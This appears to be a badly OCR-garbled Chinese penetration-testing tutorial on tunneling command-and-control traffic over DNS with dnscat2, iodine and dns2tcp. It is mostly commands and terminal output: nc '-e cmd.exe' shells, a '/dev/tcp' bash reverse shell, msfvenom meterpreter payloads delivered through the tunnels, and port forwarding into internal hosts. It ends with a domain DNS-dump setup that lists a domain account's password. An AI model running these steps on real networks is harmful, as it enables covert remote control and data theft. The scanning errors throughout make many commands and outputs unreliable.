Don't run Bundler.as root. Bundlen can :< VENIO (Ca tog Ser jed, and 
installing your bundle as root will break this application for all non-root 
users on this machine. 


bundler 2.0.2 


ecdsa 1.2.0 


salsa26 @.1.1 
sha3 1.0.1 
trollop 2.1.2 


complete! 4 Gemfile dependencies, 5 





emname] . to see where jü ed gem is installed. 


服务 端 (vps、a 记 录 指 向 服务 器 ) 执 行 如 下 命令 。 sudo ruby ./dnscat2.rb x.domain.com -- 
secret=pass111 x.domain.com 为 配置 ns 服务 器 A 记 录 域 名 ，--secret=pass111 为 dns 流量 加 密 传输 
和 及 置 的 加 密 密 码 。 


root@VM-@-8-ubuntu:~/dnscat2/server# sudo ruby ./dnscat2.rb x 
ecret=pass1119] 





客户 端 (被 控 端 ) 执 行 dnscat2-v0.07-client-win32.exe --secret=passii1 x.domain.com 


Gr Mint rane t ih arte Dee fh TRIS master Ndnascat2 Nine ate v8.0?7-client uin325dnsca 
t2-vA.B?-¢ Liest-win q g > asscifi E ll ueteres 

Creating DNS driver 

domain ^ x. 

hast - 8.8.8.8 

port "5S3 

type TRY. CNAME, MX 

server * 192.168.187.2 


we Peer verified with pre-shared secret? 


established! 





端 执行 命令 后 ， 服 务 端 控制 台 会 显示 获取 到 新 的 连接 ，window id 为 1 
Insc at2> New window created: 1 
"$sion 1 Security: ENCRYPTED ANO VERIFIED! 
curity depends on the strength of your pre-shared secret!) 
~ occurred (see window 1 for stacktrace): Duplicate SYN received! 
An error occurred (see window 1 for stacktrace): Duplicate SYN received! 





58i A window -i windowid 进 入 此 窗口 (此 通道 、 此 隧道 )。 


Kinscat2> window -i 1 

New window created: 1 

history size (session) => 1000 

Session 1 Security: ENCRYPTED AND VERIFIED! 

(the security depends on the strength of your pre-shared secret!) 
This is a command session! 


That means you can enter a dnscat2 command such as 
'ping'! For a full list of clients, try ‘help’ 
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Dnscat2 窗 口 支持 如 下 几 种 命令 
amand (WIN-IPOTGORDGOM) 1» ? 


is a list of commands (use -hion any of them for additional help): 





IN-IPeT30RDGQM) 1» B 


常用 命令 为 以 下 几 个 


Listen 
即 端 口 转发 功能 , 示例 Listen 127.0.0.1:990 192.168.187.130:7899 


该 命令 含义 是 ， 监 听 服 务 端 本 机 ip( 即 vps ip、 域 名 指向 ip) 127.0.0.1， 如 果 127.0.0.1 的 990 端 口 有 
网 络 连接 ，dnscat2 把 所 有 通过 990 端 口 的 流量 转发 至 客户 端 网 络 环境 内 的 192.168.187.130 的 7899 
端口 。 端口 转发 功能 可 使 用 在 连接 内 网 数据 库 、 反 弹 内 网 主机 shell、 连 接 内 网 其 他 系统 等 。 


Shell 


执行 系统 命令 ， 如 下 图 
command 
pent request to execute a shell 
mand (WIN-IPOT30RDGOM) 1» New window created: 2 


ll session created! 
lient sent a bad sequence number (expected 9996, received 9986); re-sending 
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执行 shell 后 dnscat2 会 新 建 一 个 shell 窗 口 ， 如 图 内 id 为 2。 进 入 该 窗口 ， 如 下 图 。 

command (WIN-IP@T3@RDGOM) 1» window -i 2 

New window created: 2 

history size (session) => 1000 

Session 2 Security: ENCRYPTED AND VERIFIED! 

(the security depends on the strength of your pre-shared secret!) 
This is a console session! 


That means that anything you type will be sent as-is to the 
client, and anything they type will be displayed as-is on the 
screen! If the client is executing a command and you don't 
see a prompt, try typing 'pwd' or something! 


To go back, type ctrl-z. 





进入 shell 后 如 下 图 所 示 ， 可 执行 windows 命 令 。 






如 需 返 回 (停止 执行 命令 ) 只 需 输入 exit 即 可 


笔者 认为 Dnscat 的 shell 窗 口 格式 化 显示 较 差 ， 建 议 使 用 listen 功 能 监听 端口 ， 客 户 端 使 用 nc 反弹 
cmd 或 bash 类 型 shel。 如 下 图 所 示 使 用 nc 反弹 windows cmd shell; 


比如 Listen 127.0.0.1:990 192.168.187.130:7899 Dnscat2 客 户 端 ( 即 被 控 端 ) 使 用 nc 监听 
7899 端 口 


nc -vv -lp 7899 -e cmd.exe 





G:\intranet\tool\cmd.exe - nc -vv -lp 7899 -e cmd.exe 


s XP CHR 612.92001 
5-280801 Microsoft Corp. 


32 NintranetNtool?nc -vu -lp 7899 -e cmd.exe 
listening on Lany] 7899 ... 
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gas tis Bllvps. 域名 指向 服务 器 ) 执 行 Nc 127.0.0.1 990 ， 如 下 图 ， 等 待 大 约 10 秒 左右 可 弹 回 


"cOOtevM.0-B-ubuntu:;-* nc 127.0.0.1 990 
i ft Windows XP 6, 2.9208 
XX* 1985-2001 


A 





tAintranetitool^whoami 
hoami 
in-ipOt30ndgamVadministratoc 


intranet\tool >ipconfig 


config 


(indows IP. SUG 


6 GGG «SEGRE 


3 DNS 
3 Ethernet@ 


ONS one te ws wl. Solocesldoesia 
fe80::4472:9063:5bc5: 4c 09x12 
192.168.187.1 
255.255.255.0 
192.168.187.2 


cmd shell( 视 网 络 环境 而 定 )。 
Upload 


士 传 文件 至 客户 端 upload ../../portmap.c c:\3.txt 





Tunnels 


command (WIN-IPOT3O0RDGQM) 1» tunnels 


要 看 当前 隧道 山口 转发 情况 。 Tunnel listening on ARE eR 





Sessions 
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显示 当前 存在 session 
command (WIN-IPOT3ORDGOM) 1» sessions 





Windows active in this session (to see all windows, go to 
the main window by pressing ctrl-z): 


1 :: command (WIN-IPOT30RDGQM) [encrypted and verified] [active] 


Exit 命 令 ， 退 出 当前 session 或 window。 Killid ， 停 止 某 个 dns 隧道 。 


此 外 ， 如 果 需 要 查看 dns 请 求 状态 ， 可 通过 在 服务 端 执行 ttpdump 查 看 dns 数据 包 。 


i ethO udp dst port 53 





tcpdump -n - 
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使 用 dns 协议 上 线 msf 之 iodine 篇 
前 言 


当 遇 到 tcp、udp、http、https、icmp 协 议 都 无 法 使 目标 主机 回 连 至 c2 控 制 端的 情况 下 ， 如 果 目 标 
主机 可 解析 外 网 域名 ， 可 以 尝试 使 用 dns 隧 道 工 具 把 目标 主机 环境 网 络 流量 转发 至 c2 控 制 端 。 本 篇 


文章 将 会 介绍 借助 lodine 使 目标 主机 连接 至 c2 控 制 端 


lodine 


lodine 的 特点 在 于 它 为 客户 端 和 服务 端 均 建立 了 两 张 虚拟 网 卡 ， 通 过 两 张 虚拟 网 卡 进行 数据 交 


换 ， lodine 的 使 用 在 gitbook 上 已 有 介绍 ， 传送 门 ( 
type id-1&id-1 


lodine 提 供 linux 与 windows 版 本 ，windows 版 需要 安装 TAP 驱 动 ， 如 下 图 官方 文档 中 已 说 明 。 
会 报错 。 


PORTABILITY 





如 果 无 TAP 驱 动 运行 iodine 报 错 如 下 图 。 


3? Nintranet Wunnel\iodine \iodine-8.7.8-windous 64bit iodine -F <r 


Error opening registry key 5fa 
; TAP adapters found. Version 8801 and 0901 are supported. 








驱动 下 载 链接 ( l 
o OpenVPN 2.4.8-1602-Win7 Setup ”| = 12 8 
O PE i Choose Components 
e er w * 
ect Compooner x 
Space regure 3 "n 
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否则 


具体 使 用 如 下 


服务 端 执行 命令 
iodined -c -P roset -f 1.1.1.1 x.domain.com -D 


lCrootSVM.0-8-ubuntu:^* iodined -c -P roset -f 1.1.1.1 x 
ebug level T enabled, will stay in foreground. 
Add more -D switches to set higher debug level. 
Jpened dnse 
Setting IP of dnsO to 1.1.1.1 
Setting MTU of dnsO to 1130 
ed IPv4 UDP socket 
ening to dns for domain x. 
pkt seq 1, frag 9 {las PIS 
pkt 8, frag 9 (la Ji; offset 0, fr | 0, total 0, to user 
j pkt from user 0, ack for downstream 8/6 
pkt user. Q0, ack. for downstream 0/0 
pkt Cyne (0, fragsize 0 otal e 0 user 
again to last du 


fragsize 43 43, from user @ 


usen: ð paaaeahq.x: ` » from dnscache 


pkt fi usen 0, ack for downstream 0 
pkt seq# 0, frag @ (last-0), offset ©, fragsize 


again to last duplicate 
pkt from user 0, ack for downstream 0/0 
pkt seq O0, frag @ (last-0), offset ©, fragsize total e user 
again to last duplicate 
user @ pa ahy, x hb fr che 
user @ paaaeala.x : : Fro scache 
user @ paaseahy. x. Ų dnscache 
pkt from user 0, for downstream 0/6 
pkt seq. @, frag @ (last-0), offset 0, fragsize 
again to last duplicate 
user 0 paaaeall.x.! dnscache 
pkt from user 0, ack for downstream 6/0 
pkt seqt 0, frag @ (last-0), offset 8, fragsize 0, total to user 
again to last duplicate 
pkt from user 0, ack for downstream 0/0 
pkt seq# 0, frag 0 (last-G), offset 0, fragsize 0, total 
j pkt from user O0, ack for downstream 0/à 
pkt seqW(.0, frag 0 (1ast-0), offset O, fragsize 0, total 6 > user 
again to last duplicate 
pkt from user @, ack for downstream 0/0 
pkti seq# 0, frag O (last-0), offset 6, fragsize total 
user 0 paaaeaja.x b from dnscache 
user @ paaaeaja.x from dnscache 
3 pkt from user Qd, ack for downstream 0/0 
pkt seat 0, frag © (last=@), offset @, fragsize 6, total 
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iador ae 1.1.1 -P:1.1:1.1. Mask: 955255. 
NHTOPOINT RUNNING NOARP- MULTICAST. MIU: 1130 
0 errors:O.dropped:O overrüns:O framo:6 
:0 errors @ deopped:O overruns: O carrie 
:8 txqueuelen:500 
6 B) IX bytes:@ (0.0 B) 


ines 


Link encap: Ethernet | HWaddr. 52:54 àb:b6 
inet addr i172.300.8 ,Bcast: (P DUET EP AS 
ADCAST RUNNING MULTICAST  MIU:1500 Metrics! 
packets: 40444877 errors:@ droppedi@ overruns;O frame: 
packet4748424978 ercors:0 dropped:O overruns:O carrie 
5:8 txqueuel 
bytes: 9428107878 (9.4 Ed: TX bytes: 8893261 


Link enéap:tecal Loopback 
inet addrc:127.0.0.1  Maxk:255.0.0.0 
UP LOOPBACK RUNNING .MTU:65S36. Metric: 
RX packets: 5 errors;O dropped:O overruns frame:0 
packet$:70774654 errors:O dropped:@ overruns:à carrier 
ions +8 Re aie iss 
128952134190 (28.9. GE TX bytes 





iodine -f -r -P roset x.domain.com 


hainandaxue@ iodine -f -r -P roset x: 
j dnso 
4 IPv4 UDP socket 
1g DNS queries for x.y to 192.168.187.2 
cting ONS query type (use -T to override).... 
NS type NULL queries 
on ok, both using protocol v 0x80000502. You are user #9 
1g IP of dnse to 1.1.1.2 
setting MTU of dns® to 1130 
er tunnel IP is 1.0.2.1 
kipping raw mode 
E extension 
ying upstream codec test. 
Got NXDOMAIN a$ reply: domain does not exist 
9 upstream codec test. 
) upstream codec test, 
Got NXDOMAIN as reply: domain does not exist 
) upstream codec test... 
9 upstream codec test. 
ching upstream to codec Base64u 
rver itched upstream to codec Base64u 
No alternative downstream codec available, using default. (Raw) 
witching to lazy mode for low-latency 
itched to lazy mode 
Obing max downstream fragment size... (Skip with -m fragsize) 
1152 ok.. ...1344 not ok ...1248 not ok.. ...1209 not ok.. ...1176 not ok.. ...1164 not ok.. will use 1152-221150 
9 downstream fragment size to max 1150... 
ng set fragsize... 
onnection setup complete, transmitting data. 
Got NXDOMAIN as reply: domain does not exist 
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此 时 查看 客户 端 (被 控 端 )， 执 行 ifconfig， 可 见 一 张 新 虚 拟 网 卡 已 启用 ，ip 为 1.1.1.2 
tmau 1ifcontrg 
dns0: fl1a9g$«4305«UP, POINTOPOINT,RUNNING,NOARP,MULTICAST» mtu 1130 
inet 1.1.1.2 netmask 255.255.255.224 destination 1.1/1.2 
Unspec 00-00-00.00-00.00-00-00-090-00-00-00-00-00.00-00 txqueuelen 508 (UNSPECI 
RX packets 0 bytes @ (0.0 B) 
RX errors 8 dropped 8 overruns @ frame 6 
TX packets 6 bytes @ (0.0 B) 
TX errors © dropped 0 overruns 9 carrier O collisions & 





ethe ¢1ags«4163<UP, BROADCAST RUNNING ,MULTICAST> mtu 1500 
inet .192.168.187.129 netmask 255.255.255.0 broadcast 192.168.187.255 
inet6 fe88::20c:29ff:fedb:61bf. prefixien 64 scopeid Ox28<link> 
ether 00:0c:29:0b:61:bf txqueuelen 1000 (Ethernet) 
RX packets 3240813 bytes 3917272889 (3.6 GiB) 
RX errors @ dropped 8 overruns 6 frane 6 
TX packets 1694425 bytes 2001645511 (190.8 MiB) 
IX errors 8 dropped 6 overruns 0 carrier 6 collisions 6 


ethl: flags*4099«UP, BROADCAST, MULTICAST>. mtu 1500 
ether 00:0c:29:0b:61:c9  txqueuelen 1000 (Ethernet) 
RX packets 0 bytes 9 (8.9 8B) 
RX errors © dropped © overruns ©. frame 9 
TX packets 0 bytes @ (6.8 B) 
TX errors © dropped © overruns 9 carrier 0 collisions 9 


lo: flags*73«UP,LOOPBACK,RUNNING» mtu 65536 
inet 127.0.0.1 netmask 255.0.0.9 
inet6 ::1 prefixlen 128 scopeid 9x16<host> 
toop txquevelen 1080 (Local Loopback) 
RX packets 12717538 bytes 2036399460 (1.8 616) 
RX errors © dropped © overruns 6 frase 6 
TX packets 12717538 bytes 2636399466 (1.8 GiB) 
{fx errors @ dropped 8 overruns © carrier @ collisions @ 





测试 连通 性 采用 服务 端 监听 端口 ， 客 户 端 连接 该 端口 。 如 下 图 服务 的 监听 6566 端 


nc -vv -lp 6566 


buntu@VM-@-8-ubuntu:~$ sudo -s 
oot@VM-9-8-ubuntu:~# nc -vv -lp 6566 
istening on [0.0.0.0] (family 0, port 6566) 





客户 端 连接 服务 端 6566 端 口 


bash -i >& /dev/tcp/1.1.1.1/6566 0>&1 


\i:~/Desktop/tools/CS314 Pro# bash -i >& /dev/tcp/1.1.1.1/6566 0>&1 





如 下 图 服务 端 接收 到 客户 端 反弹 

Last login: Fri Nov 29 12:34:10 2019 from 163.177.136.175 
ubuntuGVM-0-8-ubuntu:^$ sudo -s 

root@VM-@-8-ubuntu:~# nc -vv -lp 6566 

Listening on [0.0.0.0] (family 0, port 6566) 

Connection from [1.1.1.2] port 6566 [tcp/sane-port] accepted (family 2, sport 


«fl 


51346) 
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受 笠 就 可 以 借助 两 张 虚拟 网 卡 在 任意 端口 做 数据 传输 。 官方 称 ioline 上 行 速度 最 大 680 kbit/s, FAT 
喜庆 上 限 可 以 达到 2.3Mbits。 





借助 lodin 


未 篇 文章 介绍 借助 lodine 隧 道 ， 使 客户 端 (被 控 端 inux 服 务 器 回 连 c2 控 制 端 ，windows 主 机 版 本 使 
用 方法 类 似 。 ”首先 生成 linux ect ERE cfe 回 连 ip 填 写 ioline 服 务 端 ip。 


msfvenom -p linux/x86/meterpreter/reverse tcp LHOST-1.1.1.1 LPORT-6377 -f elf > 


-/Desktop/tools/CS314 Prot msfvenom -p linux/x86/meterpreter/reverse 
tcp LHOST=1. 1.1.1 LPORT=6377 -f elf > 2.elf 
] No platform was selected, choosing Msf::Module::Platform::Linux from the pay 
Load 
No arch Selected, selecting arch: x86 from the payload 
oder or badchars specified, outputting raw payload 
d size: 123 bytes 
size of elf file:.207 bytes 





Msf 控 制 台 使 用 相同 payload(linux/x86/meterpreter/reverse_tcp)， 并 开始 监听 。 


F exploit( à ) > show options 
Module options (exploit/multi/handler): 


Name Current Setting Required Description 


Payload options (linux/x86/meterpreter/reverse tcp): 


Name Current Setting Required Description 


LHOST 0.0.0.0 The listen address (an interface may be speci 
fied) 
LPORT 6377 The listen port 


Exploit target: 
Id Name 


8 Wildcard Target 





凸 传 2.elf 至 客户 端 主机 ， 客 户 端 即 被 控 端 (1.1.1.2) 执 行 2.elf 后 ， 服 务 端 msf 收 到 反 连 会 话 


msf exploit( j > exploit 


Started reverse TCP handler on 0.0.0.0:6377 
Sending stage (985320 bytes) to 1.1.2.2 





999 


生成 meterpreter 会 话 ， 如 下 


l| Meterpreter session 2 opened (1.1.1.1:6377 -5 1.1.1.2:531386) at 2019-11-30 01:02:59 «0800 


Interface 1 


lo 

00:00:00: 00:90:00 

65536 

: UP, LOOPBACK 

IPv4 Address : 127.0.0.1 
IPv4 Netmask : 255.0.0.0 
IPv6 Address : 1:1 
IPv6 Netmask : ffff:ffff:fFfff:fEff:ffFFifffF:: 


Interface 2 


ethe 
00:0c:29:0b:61:bf 
: 1500 
: UP, BROADCAST, MULTICAST 
Address : 192.168.187.129 
Netmask : 255.255.255,0 
Address : fe806::20c:29ff:fe0b:61bf 
IPv6 Netmask : ffff:ffff:ffff:ffff:: 


Interface 3 


Name ; eth 
Hardware MAC : 00:0c:29:0b:61:«9 
: 1500 
UP , BROADCAST , MULTICAST 


Interface 20 


t dns® 
ardware MAC : 00:00:00:00:00:00 

MTU : 1130 

Flags : UP, POINTOPOINT, NOARP , MULTICAST 
IPv4 Address : 1.1.1.2 

IPv4 Netmask : 255.255.255.224 


neterpreter > ff 


经 笔者 测试 ， 执 行 命令 响应 速度 在 可 接受 范围 内 。 





使 用 dns 协议 上 线 msf 之 dnscat2 篇 


Wa 


当 遇 到 tcp、udp、http、https、icmp 协 议 都 无 法 使 目标 主机 回 连 至 c2 控 制 端的 情况 下 ， 如 果 目 标 
主机 可 解析 外 网 域名 ， 可 以 尝试 使 用 dns 隧 道 工具 把 目标 主机 环境 网 络 流量 转发 至 c2 控 制 端 。 本 
篇 文章 将 会 介绍 借助 Dnscat2 使 目标 主机 连接 至 c2 控 制 端 。 


关于 Dnscat2 的 使 用 ， 请 查看 gitbook Dnscat2 文 章 介绍 ， 传 送 门 
(hitp://red.c: 


Dnscat2 


测试 环境 : 





客户 端 为 Window 


笔者 测试 dnscat2 无 法 在 windows 环 境 、win 版 本 msf 获 取 正 常 meterpreter session。 测试 参数 如 
下 : 客户 端 执行 命令 


Dnscat2-client.exe -secret-passi1 x.domain.com 


生成 msf 可 执行 文件 。 


msfvenom -p windows/meterpreter/bind tcp LHOSTz0.0.0.0 LPORT=7899 -f exe > 789€ 


b 


msf exploit( ) > exploit 


Started bind TCP handler against 127.0.0.1:990 

Sending stage (180291 bytes) to 127.0.0.1 

leterpreter session 3 opened (127.0.0.1:41497 -» 127.0.0.1:990) at 2019-11-30 
01:37:35 40800 


最 终 无 法 获得 session， 结 果 为 当前 session 中 断 。 如 果 有 其 他 同学 测试 成 功 ， 麻 烦请 告知 方法 和 环 
境 。 








笔者 已 测试 在 借助 dnscat2 隧 道 的 情况 下 ， 使 用 linux 可 成 功 回 连 的 模块 为 


java/meterpreter/bind tcp 
python/meterpreter/bind tcp 


linux/x86/meterpreter/bind tcp 测试 失败 ， 最 终 不 能 够 返回 正常 的 meterpreter session. 
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以 下 为 测试 过 程 测试 使 用 pythonimeterpreter/bind_tcp 模 块 进行 msf 回 连 操作 


首先 生成 msf python 版 本 py 文件 ， 根 据 dnscat2 隧 道 端口 转发 特性 ， 数据 连接 方向 为 服务 端 连接 客 
户 端 ， 使 用 命令 如 下 


msfvenom -p python/meterpreter/bind tcp LHOST=0.0.0.0 LPORT=7899 -f raw > 7899[ 


b 
服务 端 启动 dnscat2， 命 令 为 
ruby dnscat2 x.domain.com -secret=pass11 
客户 端 启动 dnscat， 命 令 为 


Dnscat2 -secret-passi1 x.domain.com 


如 下 图 


~/Desktop/tools/dnscat2/dnscat2_ client# ./dnscat -secret=passll x. 


Creating ONS driver: 
domain x.myaidou.club 
host 9.0.9.0 
port 53 
type TXT, CNAME ,MX 
server 192.168.187.2 


"uu w ou 





服务 端 dnscat2 控 制 台 接 收 到 新 session， 进 入 session 1 并 开启 端口 转发 ， 命 令 为 


listen 127.0.0.1:990 192.168.187.129:7899 


command (hellome) 1> listen 127.0.0.1:990 192.168.187.129:7899 

Listening on 127.0.0.1:990, sending connections to 192.168.187.129:7899 
command (hellome) 1» Connection from 127.0.0.1:39089; forwarding to 192.168.18 
£[6129:78997 





[Tunnel 0] connection successful! 


客户 端 执 行 msf python ft 


python 7899python.py 


python 版 本 执行 后 会 自动 后 台 执行 ， 不 会 卡 在 控制 台 


dnscat2 服 务 端 服务 器 (vps)msf 控 制 台 配 置 对 应 payload， 并 执行 连接 本 机 990 端 口 操 作 ， 等 待 一 段 
时 候 后 会 收 到 目标 主机 meterpreter session 会 话 。 
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) > show options 
e options (exploit/multi/handler): 


Name Current Setting Required Description 


load options (python/meterpreter/bind tcp): 
Current Setting Required Description 


LPORT 990 yes The listen port 
RHOST 127.0.0.1 Ihe target address 


it target: 
Name 


wildcard Target 


exploit( ) > exploit 


Started bind TCP handler against .127,6.0.1:999 
jing stage (53755 bytes) to 127.0.8.1 


erpreter 


a 
) > exploit 


Started bind TCP handler against 127.0.0.1:990 
Sending stage (53928 bytes) to 127.0.0.1 
Meterpreter session 13 opened (127.0.0.1:39089 -> 127.0.0.1:990) at 2019-12-01 01:59:02 «0800 


erpreter > getuid 
ver username: root 
eterpreter > ifconfig 


Interface 1 


Name : eth@ - eth 
fardware MAC ; 00:0c:29:0b:61:bf 
1 : 1500 
Address : 192.168.187.129 
255.255.255.0 
fe80::20c:29f f: fe@b:61bF 
ITEESETEFTEET OC ECT tes 


i lo 16 
rdware MAC : 00:00:00:00:00:00 
; 65536 
v4 Address : 127.0.0.1 
4 Netmask : 255.0.0.0 
6 Address : ::1 


vb Netmask : ffff:ffff:ffffi FFEFTLEFFE: f fF f: FFF ES FETT 


terpreter > getuid 
` username: root 


测试 使 用 javajmeterpreterlbind_tcp 模 块 进行 msf 回 连 操作 首先 生成 msf java 版 本 jar 文 件 ， 根 
据 dnscat2 隧 道 端 口 转发 特性 ， 数 据 连接 方向 为 服务 端 连接 客户 端 ， 使 用 命令 如 下 


msfvenom -p java/meterpreter/bind tcp LHOST=0.0.0.0 LPORT-7899 -f exe > 7899bir 





服务 端 启动 dnscat2， 命 令 头 


ruby dnscat2 x.domain.com -secret-passii 


SVM-0-11-ubuntu:-/tool/dnscat2/dnscat2 servert ruby dnscat2.rb xag 


secret-pass11 


window created: 0 


window created: crypto-debug 


> to dnscat2! Some documentation may be out of date. 
auto attach 
19090 
be encrypted and authenticated 
“on 0.0.0.0 


have an authoritative DNS server, you can run 


nywhere with the following ( st is optiona 


To talk directly to the 5 er without a domain name, run: 
.[dnscat -:dns server=x.x.x.%,port=53.->secretspassil 


<server> yourself? Clients 





如 下 图 


动 dnscat， 命 令 为 


Dnscat2 -secret=pass11 x.domain.com 


如 下 图 


:~/Desktop/tools/dnscat2/dnscat2 client& ./dnscat -secret-passll x. 





Creating DNS driver: 
domain - x.myaidou.club 
host 0.0.0.0 


port 53 
type TXT, CNAME , MX 
server 192.168.187.2 


服务 端 dnscat2 控 制 台 接收 到 新 Session， 进 入 session 1 并 开启 端口 转发 ， 命 令 为 
listen 127.0.0.1:990 192.168.187.129:7899 


.129:7899 


r e, 


command (hellome) 1> listen 127.0.0.1:990 192.168.187 


Listening on 127.0.0.1:990, sending connections to 192.168.187.129:7899 
command (hellome) 1» i 


客户 端 执行 msf jar 文 件 。 





java -jar 7899bindjava.jar 
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E 


scat RA UR ZS Sms tie AEE payload, HARE PIRE, W FERREIS AN 


meterpreter sessione 
j | J-> set payload java/meterpreter/bind tcp 
java/meterpreter/bind tcp 
et J > set rhost 127.0.0.1 





} > set lport 990 


) > exploit 


i bind TCP handler against 127.0.0.1:990 
age (53928 bytes) to 127.0.0.1 
| session 1 opened (127.@0.0.1:41575 -> 127.0.0.1:990) at 2019-12 
+8800 
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使 用 dns 协议 上 线 msf 之 dns2tcp 篇 


eue 


I 


当 遇 到 tcp、udp、http、https、icmp 协 议 都 无 法 使 目标 主机 回 连 至 c2 控 制 端的 情况 下 ， 如 果 目 标 
主机 可 解析 外 网 域名 ， 可 以 尝试 使 用 dns 隧道 工具 把 目标 主机 环境 网 络 流量 转发 至 c2 控 制 端 。 ”本 
篇 文章 将 会 介绍 借助 dns2tcp 使 目标 主机 连接 至 c2 控 制 端 。 


dns2tcp 


关于 dns2tcp 的 使 用 ， 请 查看 gitbook dns2tcp 文 章 介绍 ， 传 送 门 
( pps 首先 根据 目标 环境 ， 创 建 msf 回 连 
可 执行 文件 ， 如 下 图 ， 因 为 将 会 使 用 dns2tcp 端 口 转发 功能 ， 所 有 流量 需 转发 至 本 地 某 个 端口 ， 故 配 
置 反 连 服务 器 ip 为 127.0.0,1， isa sies 
msfS payload({ ) > show options 


Module options (payload/windows/meterpreter reverse tcp): 


Name Current Setting Required Description 


EXITFUNC process Exit technique (Accepted: '', seh, thr 
ead, process, none) 
EXTENSIONS Comma-separate list of extensions to l 
oad 
EXTINIT Initialization strings for extensions 
127.0.0.1 The listen address (an interface may b 


The listen port 


msf5 payload( terpret t ! tcp) > generate -f exe -o /root/reverse 
9898big. exe j 
{*} Writing 254976 bytes to /root/reverse9098big.exe... 


Dns2tcp 配 置 文件 内 容 如 下 





listen - 0.9.0.0 

port = 53 

user = nobody 

chroot = /tmp 

domain = x.domain.com 

resources = ndsc:127.0.0.1:8787 
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启动 Dns2tcp 服 务 端 , 如 下 图 。 
6-8-ubuntu:-/dns2tcp/serverst ./dns2tcpd -f /etc/dns2tcp.conf -F -d 3 
Debug options.c:97 Add resource ndsc:127.0.0.1 port 878 
Debug socket.c:55 Listening on 0.0.0.0:53 for domain x. 





16:072: 9 


ting Server 0:572. 
Debug main.c:132 Chroot to /tmp 
Debug main.c:142 Change to user nobody 


M-@-8-ubuntu:~/dns2tcp/server# ./drs2tcpd -f /etc/dns2tcp.conf -F -d 3 
Debug options.c:97 Add resource ndsc:127.0.0.1 port 8787 
Debug socket.c:55 Listening on 0.0.0.0:53 for domain x. 


Server v0.5.2... 
Debug main.c:132 Chroot to /tmp 
Debug main.c:142 Change to user nobody 


NE 控制 台 配 置 payload 并 开启 监听 ， 监 听 端 口 与 dns2tcp resources 内 端口 对 应 ， 如 下 图 
ee ge VEE E ) > show options 
exploit/multi/handler): 


Description 


) > set payload windows/meterpreter/reverse tcp 
ws/meterpreter <p 

)» set lhost 127.0.0.1 

) > set lport 8787 


) > exploit 


ing to a loopback address by tting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? 
e TCP handler on 127.0.0.1:8787 


dns2tcpc.exe -c -d 1 -1 9098 -r ndsc -z x.domain.com 


it Nintranet \tunne1\ProxyToo lkits-master>dns2tcpc.exe -c -d 1 -1 9898 -r ndsc -z 


© DNS given, using 192.168.187.2 (first system preferred DNS server) 
lehug level 1 
Listening on port : 99098 
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把 已 生成 好 的 msf exe 上 传 至 客户 端 (被 控 端 ) 主 机 ， ， 查 看 端口 连接 状况 ， 程 序 正在 向 本 地 
9080 端 口 发 送 数 据 ， 如 下 图 所 示 。 


=\ilindows \Tenpodir ere a 


驱动 如 C 中 的 各 没有 标签 


兰 的 序列 号 时 6883-B4B8 
c:NWindows \Tenp 83 B e 


2019712702 -15:36 ; 254,976 Feverse?038big.exe 
; SOC 254,976 FP 
(Fat 63.123.664.896 RFP 


: Windows \Temp>reverse9@98big.exe 


= Windows \Temp>netstat -ant i find “9698"' 
TCP 127.0.0.1:9098 0.0.0.0:0 LISTENING InHost 


TCP 127.80.0.1:9098 127.8.0.1:690655 TIME URIT InHost 
TCP 127.0.0.1:9098 127.0.0.1:690656 TIME URIT InHost 
TCP 127.0.0.1:9898 127.90.9.1:690657 ESTABLISHED InHost 
TCP 127.0.0.1:9098 127.08.0.1:60660 ESTRBLISHED InHost 
TCP 127.0.0.1:6065? 127.0.0.1:98098 ESTABLISHED InHost 


TCP 127.8.0.1:680668 127.8.0.1:9998 ESTABLISHED InHost 


queue.c:341 queue flush expired data, flush expired req id 0x98d6 
requests.c:205 Sending [4214] len = 68 dns id = @x98d6 v/cAABB2EA 
requests.c:167 Receive query : v/cQXxB3BA dns id - 0xa255 for domain 
— 

queue.c:642 Packet [4215] decoded, data len 6 

queue.c:653 diff - 24 

queue.c:407 Queue : dealing packet 4215 

queue.c:300 Flushing outgoing data 

queue.c:341 queue flush expired data, flush expired req id 0xa255 
requests.c:205 Sending [4215] len - 68 dns id - 0xa255 v/cAABB3EA 
requests.c:167 Receive query : v/cQYBBABA dns id - 0x736f for domain 


queue.c:642 Packet [4216] decoded, data len 6 

queue.c:653 Arf Tn 

queue. c: 407 Queue : dealing packet 4216 

queue. c: 300 Flushing outgoing data 

queue.c:341 queue flush expired data, flush expired req id 0x736f 
requests.c:205 Sending [4216] len = 68 dns id = 0x736f v/cAABBAEA 
requests.c:167 Receive query : v/cQYRBSBA dns id - 0x6896 for domain 


Packet [4217] decoded, data len 6 
diff - 24 

Queue : dealing packet 4217 
Flushing outgoing data 





[^ p) 


警 待 一 段 时 间 后 ， 即 可 收 到 客户 端的 meterpreter shell， 经 笔者 测试 响应 速度 比 cs 控制 台 响 应 快 。 


exploit( jie) > exploit 


Started reverse TCP handler on 0.0.0.0:8787 

sending stage (180291 bytes) to 127.0-0.1 

Meterpreter session 2 opened (127.0.0.1:8787 -> 127.0.0.1:38950) at 2019-1 
15:36:56 +0800 

Failed to load extension: No response was received to the core loadlib req 


ct 


Failed to load extension: No response was received to the core enumextemd 


quest 


eter 


Sending stage (180291 bytes) to 127.0.0.1 

Meterpreter session 3 opened (127.0.0.1:8787 -> 127.0.0.1:39046) at 2019-1 
15:38:35 +0800 

127.0.0.1 - Meterpreter session 2 closed. Reason: Died 


preter > Failed to load extension: No response was réceived to the co 


> loadlib request. 
Failed to load extension: No response was received to the core _enumextcmd 


l "E. 
uest 


4 


+ 


erpreter > ifconfig 


nterfac e 1 


Software Loopback Interface 1 


Hardware MAC : 00:00:00:00:00:00 


: 4294967295 
Address : 127.0.0.1 
Netmask : 255.0.0.0 
6 Address : ::1 


letmask : ffff:ffff:ffff:fTfff:ffff:ffff:ffff:.ffff 


: Intel(R) 82574L 
: 00:0c:29:77:6b:42 
1500 


IPv4 Address : 192.168.187.130 
v4 Netmask : 255.255.255.0 


| Address : fe80::4472:9063:5bc5:4c09 


6 Netmask : ffff:ffff:ffff:ffff:: 
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网 络 连 接 与 端口 
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用 普通 权限 的 域 帐 户 获得 域 环 境 中 所 有 DNS 解析 记录 


所 在 域 : God.org [ 此 处 仅 模拟 单 域 环境 ] 
jiz: OWA2010CN-God [ 此 机 器 模拟 主 域 控 ] 
掌握 一 台 域 机 器 


掌握 的 域 用 户 账号 密码 : god\webadmin admin! @#45 


编译 dnsdump 


